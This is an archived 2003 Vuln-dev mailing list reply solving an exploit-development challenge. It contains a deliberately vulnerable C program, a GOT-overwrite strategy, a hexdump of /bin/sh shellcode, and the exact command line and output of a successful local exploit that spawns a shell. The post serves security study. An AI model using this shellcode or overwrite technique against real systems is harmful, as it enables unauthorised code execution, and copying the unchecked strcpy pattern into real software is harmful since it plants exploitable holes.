Vulnerability Development mailing list archives

Re: [Vuln-dev Challenge] Challenge #2

From: Jason_Royes <jroyes () da-experts com>
Date: 24 May 2003 01:05:54 -0400

Strategy was to overwrite printf pointer with shellcode address.

1) Overwrite pointer held in bfp with strcpy(buf, argv[1]).

before:
[buf][bfp][ret]
after:
[buf][&printf - 2][ret]

Subtract 2 from printf addr to compensate for ";;%s;;" in fprintf

2) Overwrite printf function pointer with argv[2], fgets(bfp, BFSIZE, f1), f1 contains address of argv[1] or buf.

3) printf is then called which gives a shell.

Note that a BUFSIZE of 90 actually allocates 92 bytes on the stack.

/* vulndev2.c */

#include <stdio.h>
#include <stdlib.h>

#define BFSIZE 90

int
main(int argc, char *argv[])
{
        char    *bfp;
        char    buf[BFSIZE];
        FILE    *f1;

        if (argc != 3)
                return 1;
        if ( (bfp = malloc(BFSIZE)) == NULL)
                return 1;
        /* debug */
        printf("bfp = %p, buf = %p\n", bfp, buf);

        /* log input */
        if ( (f1 = fopen("db.log", "a+")) == NULL)
                return 1;
        fprintf(f1, ";;%s;;", argv[2]);
        fclose(f1);

        strcpy(buf, argv[1]);

        /* read log */
        if ( (f1 = fopen("db.log", "r")) == NULL)
                return 1;
        if (fgets(bfp, BFSIZE, f1) == NULL)
                return 1;

        printf("%s\n", bfp);
        fclose(f1);
        exit(1);
}
##
jroyes@tadpole:~/study/vuln-dev/cha2$ objdump -R vd2

vd2:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049874 R_386_GLOB_DAT    __gmon_start__
08049848 R_386_JUMP_SLOT   __register_frame_info
0804984c R_386_JUMP_SLOT   fprintf
08049850 R_386_JUMP_SLOT   malloc
08049854 R_386_JUMP_SLOT   __deregister_frame_info
08049858 R_386_JUMP_SLOT   fgets
0804985c R_386_JUMP_SLOT   __libc_start_main
08049860 R_386_JUMP_SLOT   printf
08049864 R_386_JUMP_SLOT   fclose
08049868 R_386_JUMP_SLOT   exit
0804986c R_386_JUMP_SLOT   fopen
08049870 R_386_JUMP_SLOT   strcpy


jroyes@tadpole:~/study/vuln-dev/cha2$ hexdump -C tiny.shell
00000000  31 db 31 c9 b0 46 cd 80  31 c0 50 68 2f 73 68 ff  |1.1..F..1.Ph/sh.|
00000010  88 44 24 03 68 2f 62 69  6e 89 e3 50 53 89 e1 31  |.D$.h/bin..PS..1|
00000020  d2 b0 0b cd 80                                    |.....|
00000025
jroyes@tadpole:~/study/vuln-dev/cha2$ ./vd2 `perl -e 'print "A"x55'``cat tiny.shell``printf "\x5e\x98\x04\x08"` `printf 
"\x6c\xfa\xff\xbf"`
bfp = 0x8049898, buf = 0xbffffa6c
sh-2.05a$ exit
jroyes@tadpole:~/study/vuln-dev/cha2$ 
##
Thanks to sin for the tiny shellcode.

On Fri, 2003-05-23 at 18:13, Dave McKinney wrote:


We are announcing the second challenge.  Initially, we wanted to have this
out a few days ago but were involved in testing it on multiple platforms.
This challenge is a little easier than the first one, since we'd like to
see more people attempting to produce a proof-of-concept.  If you find it
too easy, you're welcome to attempt it in an environment with a
non-executable stack/heap to raise the bar a little.

Here's a link to the basic guidelines (for those who missed it):

http://www.securityfocus.com/archive/82/321615/2003-05-13/2003-05-19/0

(also, please retain the [Vuln-dev Challenge] string in the subject line
for replies to make for easier filtering for those not interested in
challenge related discussion.)

---

/* vulndev2.c */

#include <stdio.h>
#include <stdlib.h>

#define BFSIZE 90

int
main(int argc, char *argv[])
{
        char    *bfp;
        char    buf[BFSIZE];
        FILE    *f1;

        if (argc != 3)
                return 1;
        if ( (bfp = malloc(BFSIZE)) == NULL)
                return 1;

        /* log input */
        if ( (f1 = fopen("db.log", "a+")) == NULL)
                return 1;
        fprintf(f1, ";;%s;;", argv[2]);
        fclose(f1);

        strcpy(buf, argv[1]);

        /* read log */
        if ( (f1 = fopen("db.log", "r")) == NULL)
                return 1;
        if (fgets(bfp, BFSIZE, f1) == NULL)
                return 1;

        printf("%s\n", bfp);
        fclose(f1);
        exit(1);
}

---

Dave McKinney
Symantec

keyID: BF919DD7
key fingerprint = 494D 6B7D 4611 7A7A 5DBB  3B29 4D89 3A70 BF91 9DD7

-- 
Jason Royes
Data Access Experts
http://www.da-experts.com/

Current thread:

[Vuln-dev Challenge] Challenge #2 Dave McKinney (May 23)
- Re: [Vuln-dev Challenge] Challenge #2 Thomas Cannon (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 (SPOILER) Joel Eriksson (May 24)
  - Re: [Vuln-dev Challenge] Challenge #2 (SPOILER) Joel Eriksson (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Jason_Royes (May 24)
- [Vuln-dev Challenge] nonexec stack&heap solution (encrypted) Jose Ronnick (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 anon (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 spacewalker (May 24)
  - Re: [Vuln-dev Challenge] Challenge #2 Jose Ronnick (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Janus N. (May 24)
  - Re: [Vuln-dev Challenge] Challenge #2 Diode Trnasistor (May 26)
    - Re: [Vuln-dev Challenge] Challenge #2 Janus N. (May 26)
    - Re: [Vuln-dev Challenge] Challenge #2 Robert Hogan (May 30)
    - Re: [Vuln-dev Challenge] Challenge #2 Janus N. (May 30)
  - Gera's Insecure Programing abo7 sin (May 30)

(Thread continues...)